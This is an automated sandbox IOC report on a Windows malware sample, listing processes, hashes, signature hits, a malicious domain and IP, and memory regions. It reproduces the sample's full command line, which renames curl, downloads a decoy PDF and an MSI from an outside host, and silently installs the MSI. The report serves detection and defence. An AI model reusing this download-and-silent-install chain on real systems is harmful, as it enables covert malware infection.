Automated Malware Analysis IOC Report for

Files

File Path

Type

Processes

Path

Cmdline

Malicious

C:\Windows\SysWOW64\cmd.exe

cmd /C ""C:\Windows\System32\cmd.exe" /c cd /d "C:\Users\Gloza\AppData\Local\Temp\" & copy c:\windows\system32\curl.exe TNheBOJElq.exe & TNheBOJElq.exe -o "C:\Users\Gloza\Documents\QMQjaBdqIo.pdf" https://dbs5.pwods.com/download/pdf & "C:\Users\Gloza\Documents\QMQjaBdqIo.pdf" & TNheBOJElq.exe -o bLhLldebqq.msi https://dbs5.pwods.com/download/agent & C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn"

Details

Is windows:	true
Is dropped:	false
PID:	4400
Target ID:	0
Parent PID:	5472
Name:	cmd.exe
Class:	cmd
Path:	C:\Windows\SysWOW64\cmd.exe
Commandline:	cmd /C ""C:\Windows\System32\cmd.exe" /c cd /d "C:\Users\Gloza\AppData\Local\Temp\" & copy c:\windows\system32\curl.exe TNheBOJElq.exe & TNheBOJElq.exe -o "C:\Users\Gloza\Documents\QMQjaBdqIo.pdf" https://dbs5.pwods.com/download/pdf & "C:\Users\Gloza\Documents\QMQjaBdqIo.pdf" & TNheBOJElq.exe -o bLhLldebqq.msi https://dbs5.pwods.com/download/agent & C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn"
Size:	236544
MD5:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Time:	08:32:33
Date:	07/10/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x790000
Modulesize:	368640
Wow64:	true

Signature Hits	Behavior Group	Mitre Attack
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Sigma detected: Suspicious Copy From or To System Directory	System Summary
Very long cmdline option found, this is very uncommon (may be encrypted or packed)	HIPS / PFW / Operating System Protection Evasion	Command and Scripting Interpreter
Spawns processes	System Summary	Process Injection

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Details

Is windows:	true
Is dropped:	false
PID:	2764
Target ID:	1
Parent PID:	4400
Name:	conhost.exe
Path:	C:\Windows\System32\conhost.exe
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Size:	862208
MD5:	0D698AF330FD17BEE3BF90011D49251D
Time:	08:32:33
Date:	07/10/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff6d64d0000
Modulesize:	892928
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Spawns processes	System Summary	Process Injection

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c cd /d "C:\Users\Gloza\AppData\Local\Temp\"

Details

Is windows:	true
Is dropped:	false
PID:	7128
Target ID:	2
Parent PID:	4400
Name:	cmd.exe
Class:	cmd
Path:	C:\Windows\SysWOW64\cmd.exe
Commandline:	"C:\Windows\System32\cmd.exe" /c cd /d "C:\Users\Gloza\AppData\Local\Temp\"
Size:	236544
MD5:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Time:	08:32:33
Date:	07/10/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x790000
Modulesize:	368640
Wow64:	true

Signature Hits	Behavior Group	Mitre Attack
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Sigma detected: Suspicious Copy From or To System Directory	System Summary
Very long cmdline option found, this is very uncommon (may be encrypted or packed)	HIPS / PFW / Operating System Protection Evasion	Command and Scripting Interpreter
Spawns processes	System Summary	Process Injection

C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe

TNheBOJElq.exe -o "C:\Users\Gloza\Documents\QMQjaBdqIo.pdf" https://dbs5.pwods.com/download/pdf

Details

Is windows:	false
Is dropped:	true
PID:	1532
Target ID:	3
Parent PID:	4400
Name:	TNheBOJElq.exe
Path:	C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe
Commandline:	TNheBOJElq.exe -o "C:\Users\Gloza\Documents\QMQjaBdqIo.pdf" https://dbs5.pwods.com/download/pdf
Size:	470528
MD5:	44E5BAEEE864F1E9EDBE3986246AB37A
Time:	08:32:33
Date:	07/10/2024
Reason:	newprocess
Reputation:	moderate
Is admin:	true
Is elevated:	true
Modulebase:	0xc0000
Modulesize:	487424
Wow64:	true

Signature Hits	Behavior Group	Mitre Attack
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Drops PE files	Persistence and Installation Behavior
Sigma detected: Suspicious Copy From or To System Directory	System Summary
Creates files inside the program directory	System Summary	Masquerading
Found CURL tool	Networking	Application Layer Protocol
Public key (encryption) found	Cryptography	Archive Collected Data
Sample might require command line arguments	System Summary	Command and Scripting Interpreter
Spawns processes	System Summary	Process Injection
URLs found in memory or binary data	Networking
Binary contains paths to debug symbols	Compliance, System Summary

C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe

TNheBOJElq.exe -o bLhLldebqq.msi https://dbs5.pwods.com/download/agent

Details

Is windows:	false
Is dropped:	true
PID:	6484
Target ID:	4
Parent PID:	4400
Name:	TNheBOJElq.exe
Path:	C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe
Commandline:	TNheBOJElq.exe -o bLhLldebqq.msi https://dbs5.pwods.com/download/agent
Size:	470528
MD5:	44E5BAEEE864F1E9EDBE3986246AB37A
Time:	08:32:35
Date:	07/10/2024
Reason:	newprocess
Reputation:	moderate
Is admin:	true
Is elevated:	true
Modulebase:	0xc0000
Modulesize:	487424
Wow64:	true

Signature Hits	Behavior Group	Mitre Attack
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Drops PE files	Persistence and Installation Behavior
Sigma detected: Suspicious Copy From or To System Directory	System Summary
Creates files inside the program directory	System Summary	Masquerading
Found CURL tool	Networking	Application Layer Protocol
Public key (encryption) found	Cryptography	Archive Collected Data
Sample might require command line arguments	System Summary	Command and Scripting Interpreter
Spawns processes	System Summary	Process Injection
URLs found in memory or binary data	Networking
Binary contains paths to debug symbols	Compliance, System Summary

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn

Details

Is windows:	true
Is dropped:	false
PID:	7096
Target ID:	5
Parent PID:	4400
Name:	msiexec.exe
Class:	system-tools
Path:	C:\Windows\SysWOW64\msiexec.exe
Commandline:	C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn
Size:	59904
MD5:	9D09DC1EDA745A5F87553048E57620CF
Time:	08:32:37
Date:	07/10/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7a0000
Modulesize:	73728
Wow64:	true

Signature Hits	Behavior Group	Mitre Attack
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Sigma detected: Suspicious Copy From or To System Directory	System Summary
Very long cmdline option found, this is very uncommon (may be encrypted or packed)	HIPS / PFW / Operating System Protection Evasion	Command and Scripting Interpreter
Spawns processes	System Summary	Process Injection

C:\Windows\System32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

Details

Is windows:	true
Is dropped:	false
PID:	432
Target ID:	6
Parent PID:	632
Name:	msiexec.exe
Class:	system-tools
Path:	C:\Windows\System32\msiexec.exe
Commandline:	C:\Windows\system32\msiexec.exe /V
Size:	69632
MD5:	E5DA170027542E25EDE42FC54C929077
Time:	08:32:37
Date:	07/10/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff7f43f0000
Modulesize:	94208
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Sigma detected: Suspicious Copy From or To System Directory	System Summary
Very long cmdline option found, this is very uncommon (may be encrypted or packed)	HIPS / PFW / Operating System Protection Evasion	Command and Scripting Interpreter
Spawns processes	System Summary	Process Injection

URLs

Name

Malicious

https://curl.se/docs/hsts.html

unknown

https://dbs5.pwods.com/download/pdf

8.209.119.17

https://curl.se/docs/copyright.htmlD

unknown

https://curl.se/libcurl/c/curl_easy_setopt.html

unknown

https://dbs5.pwods.com/download/agent

8.209.119.17

https://curl.se/P

unknown

https://curl.se/docs/http-cookies.html#

unknown

https://curl.se/docs/http-cookies.html

unknown

https://curl.se/docs/hsts.html#

unknown

https://curl.se/docs/sslcerts.html

unknown

https://curl.se/docs/sslcerts.htmlcurl

unknown

There are 1 hidden URLs, click here to show them.

Domains

Name

Malicious

dbs5.pwods.com

8.209.119.17

Details

Name:	dbs5.pwods.com
IP:	8.209.119.17
TargetID:	-1
Active:	true

Signature Hits	Behavior Group	Mitre Attack
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Sigma detected: Suspicious Copy From or To System Directory	System Summary
Very long cmdline option found, this is very uncommon (may be encrypted or packed)	HIPS / PFW / Operating System Protection Evasion	Command and Scripting Interpreter
Downloads files from webservers via HTTP	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
Performs DNS lookups	Networking	Application Layer Protocol Non-Application Layer Protocol
Spawns processes	System Summary	Process Injection
URLs found in memory or binary data	Networking
Uses secure TLS version for HTTPS connections	Compliance, Networking

IPs

Domain

Country

Malicious

8.209.119.17

dbs5.pwods.com

Singapore

Details

IP:	8.209.119.17
TargetID:	3
Current Path:	C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe
Country:	Singapore
Countrycode:	SGP
ASN number:	45102
ASN name:	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
Private:	false
Domain:	dbs5.pwods.com

Signature Hits	Behavior Group	Mitre Attack
Uses secure TLS version for HTTPS connections	Compliance, Networking

127.0.0.1

unknown

Memdumps

Base Address

Regiontype

Protect

Malicious

2C00000

heap

page read and write

27FD000

stack

page read and write

2AC4000

heap

page read and write

2F66000

heap

page read and write

2F67000

heap

page read and write

3070000

remote allocation

page read and write

2A9B000

heap

page read and write

29AD000

stack

page read and write

130000

unkown

page readonly

2A50000

heap

page read and write

2F63000

heap

page read and write

2F84000

heap

page read and write

31CF000

stack

page read and write

2A63000

heap

page read and write

115000

unkown

page readonly

12F000

unkown

page read and write

2AAB000

heap

page read and write

2C25000

heap

page read and write

2F40000

remote allocation

page read and write

2FC3000

heap

page read and write

2BEE000

stack

page read and write

2F95000

heap

page read and write

2F85000

heap

page read and write

2FAA000

heap

page read and write

C1000

unkown

page execute read

2FC3000

heap

page read and write

2F40000

remote allocation

page read and write

2F84000

heap

page read and write

2A6C000

heap

page read and write

2F40000

remote allocation

page read and write

2AC4000

heap

page read and write

2A94000

heap

page read and write

115000

unkown

page readonly

2DFE000

stack

page read and write

2EFF000

stack

page read and write

2C20000

heap

page read and write

2F98000

heap

page read and write

2A85000

heap

page read and write

30DF000

stack

page read and write

C0000

unkown

page readonly

2D60000

heap

page read and write

C0000

unkown

page readonly

12F000

unkown

page read and write

30CE000

stack

page read and write

3070000

remote allocation

page read and write

2A58000

heap

page read and write

2FC3000

heap

page read and write

C1000

unkown

page execute read

2F9A000

heap

page read and write

2A94000

heap

page read and write

2CFD000

stack

page read and write

2AAB000

heap

page read and write

2A94000

heap

page read and write

2F4F000

stack

page read and write

115000

unkown

page readonly

3050000

heap

page read and write

2BAE000

stack

page read and write

C0000

unkown

page readonly

2D5E000

stack

page read and write

2AC4000

heap

page read and write

C1000

unkown

page execute read

2F58000

heap

page read and write

2D75000

heap

page read and write

2F3E000

stack

page read and write

2FD0000

heap

page read and write

2F50000

heap

page read and write

130000

unkown

page readonly

130000

unkown

page readonly

2D70000

heap

page read and write

2BF0000

heap

page read and write

2D10000

heap

page read and write

2F68000

heap

page read and write

3070000

remote allocation

page read and write

2A94000

heap

page read and write

2F69000

heap

page read and write

2F97000

heap

page read and write

2F98000

heap

page read and write

2FAA000

heap

page read and write

2A85000

heap

page read and write

C0000

unkown

page readonly

C1000

unkown

page execute read

3080000

heap

page read and write

2A6A000

heap

page read and write

130000

unkown

page readonly

2A85000

heap

page read and write

2A60000

heap

page read and write

2A64000

heap

page read and write

115000

unkown

page readonly

2A69000

heap

page read and write

2B60000

heap

page read and write

26FD000

stack

page read and write

2A85000

heap

page read and write

2F60000

heap

page read and write

There are 83 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report

Files

Processes

URLs

Domains

IPs

Memdumps